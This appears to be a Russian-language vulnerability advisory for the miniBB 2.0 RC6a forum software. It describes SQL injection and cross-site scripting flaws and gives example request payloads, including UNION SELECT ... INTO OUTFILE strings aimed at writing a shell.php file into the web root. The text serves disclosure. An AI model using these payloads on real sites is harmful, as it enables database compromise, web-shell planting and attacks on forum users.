• Партнер

  • Программа: miniBB 2.0 RC6a, возможно более ранние версии.

    Уязвимость позволяет удаленному пользователю произвести XSS нападение и
    выполнить произвольные SQL команды в базе данных приложения.

    1. Уязвимость существует из-за недостаточной обработки входных данных в
    параметрах confirmCode и post в сценарии index.php. Удаленный пользователь может
    с помощью специально сформированного URL выполнить произвольные SQL команды в
    базе данных приложения.

    Примеры:

    /index.php?action=confirmpasswd&confirmCode=f' union select '' from mysql.user
    INTO OUTFILE '/var/www/html/shell.php'/*
    /index.php?action=delmsg&post=1' union select 1,1 from mysql.user INTO OUTFILE
    '/tmp/passwd'/*
    /index.php?action=editmsg&post=1' union select 1,1 from mysql.user INTO OUTFILE
    '/tmp/passwd'/*

    2. Уязвимость существует из-за недостаточной обработки входных данных в
    параметрах “user_usr”, “email” и “login”. Удаленный пользователь может с помощью
    специально сформированного POST запроса выполнить произвольные SQL команды в
    базе данных приложения.

    Пример:

    user_usr=f' union select '','123' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/*
    /?action=sendpass&email=f' union select 0,0,'' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/*
    /?action=registernew&login||email=1' union select 1 from mysql.user INTO OUTFILE
    '/tmp/passwd'/*

    3.Уязвимость существует из-за недостаточной обработки входных данных в параметре
    “queryStr”. Удаленный пользователь может с помощью специально сформированного
    POST запроса выполнить произвольный код сценарий в браузере жертвы в контексте
    безопасности уязвимого сайта.

    Пример:

    POST /index.php?sortBy=1 HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
    Host: minibb.local:80
    Content-Length: 91
    Connection: Close

    user_usr=1&user_pwd=1&mode=login&queryStr=">&pagetype=index

     

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии